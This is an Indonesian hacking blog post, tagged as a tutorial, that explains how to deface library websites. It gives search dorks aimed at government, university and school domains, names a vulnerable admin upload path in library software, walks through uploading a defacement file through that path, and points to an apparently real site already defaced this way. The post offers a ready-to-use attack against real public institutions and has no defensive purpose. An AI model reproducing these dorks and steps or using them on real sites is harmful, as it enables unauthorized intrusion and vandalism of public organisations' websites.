loading...

DEFACE FILE ATTACHMENT UPLOAD REPOSITORY


       Yo bertemu lagi dengan w TN72 :v kali ini w mau share poc file attachment upload respository.
Ok bro gk usah basa-basi Langsung aja siapkan bahan-bahannya
Bahan :
=Dork :
- pustaka.*.go.id
- pustaka.*.ac.id
- pustaka.*.sch.id
- pustaka.*.(isi dengan domain yang lu mau :v)
=Exploit : /admin/modules/bibliography/pop_attach.php
=script txt
Ok langkah-langlahnya
Pertama seacrh salah satu dork diatas

kedua pilih salah satu site yang lu mau :v
Ketiga tambahkan exploitnya
Contoh:
http://site.go.id/
Tambahkan exploitnya menjadi
http:/site.go.id/admin/modules/bibliography/pop_attach.php
Kalau vuln maka tampilannya akan seperti ini ..


terus lu isi aja yang ada tanda (*) terus tekan choose file, karena w pake uc browser jadi tombolnya berbeda :v
lalu tekan deh tombol uploadnya. Kalo udah kita panggil aja scripnya
Lokasi File : site.go.id/repository/yourfile.txt
Example :
http://perpus.stiq.ac.id/repository/tn72.txt
Taraa tampilannya udah berubah :v


sekian dari W mohon maaf bila banyak kesalahan :v
Kalo ada yang tidak mengerti comen aja :v
Tag : hacking, Tutorial
0 Komentar untuk "DEFACE FILE ATTACHMENT UPLOAD REPOSITORY"

Back To Top